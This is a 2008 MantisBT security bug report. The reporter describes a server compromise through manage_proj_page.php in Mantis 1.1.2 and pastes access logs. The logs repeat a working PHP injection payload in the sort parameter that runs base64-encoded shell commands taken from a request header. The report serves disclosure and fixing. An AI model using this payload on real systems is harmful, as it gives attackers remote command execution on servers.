0009858: Security problem - XSS attac possible in Mantis 1.1.2 - MantisBT - Signup temporarily disabled due to spam

ID	Project	Category	View Status	Date Submitted	Last Update

0009858	mantisbt	security	public	2008-11-19 11:03	2009-06-26 12:06

Reporter	cooper64	Assigned To	thraxisp
Priority	normal	Severity	crash	Reproducibility	N/A
Status	closed	Resolution	fixed
Product Version	1.1.2

Summary	0009858: Security problem - XSS attac possible in Mantis 1.1.2
Description	Because I got still no answer in the forum, i write in my problem here again. On last Sunday my server was attacked over a security hole in Mantis. My provider informed me about the attack and that the file manage_proj_page.php was the attack-point. In the result my crontab was overwrite whith this entry: /pages/eb/d0005490/home/htdocs/testserver/mantis/mc-root/update > /dev/null 2>&1 Also the directory mc-root was created in the mantis directory with any files (some looks like system files - i'm not a linux-user) and a virus named: Linux Procfake. I have Mantis now completely closed.
Additional Information	Here my Log: 75.127.107.0 - - [15/Nov/2008:08:36:44 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-" 75.127.107.0 - - [15/Nov/2008:08:36:48 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3758 "-" "-" 75.127.107.0 - - [15/Nov/2008:08:37:15 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 4190 "-" "-" 75.127.107.0 - - [15/Nov/2008:08:37:20 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3866 "-" "-" 75.127.107.0 - - [15/Nov/2008:10:00:24 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-" 75.127.107.0 - - [15/Nov/2008:10:01:09 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-" 75.127.107.0 - - [15/Nov/2008:10:01:11 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3783 "-" "-" 75.127.107.0 - - [15/Nov/2008:10:01:14 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3794 "-" "-" 75.127.107.0 - - [15/Nov/2008:10:01:29 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3659 "-" "-" 75.127.107.0 - - [15/Nov/2008:10:01:39 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3732 "-" "-"
Tags	No tags attached.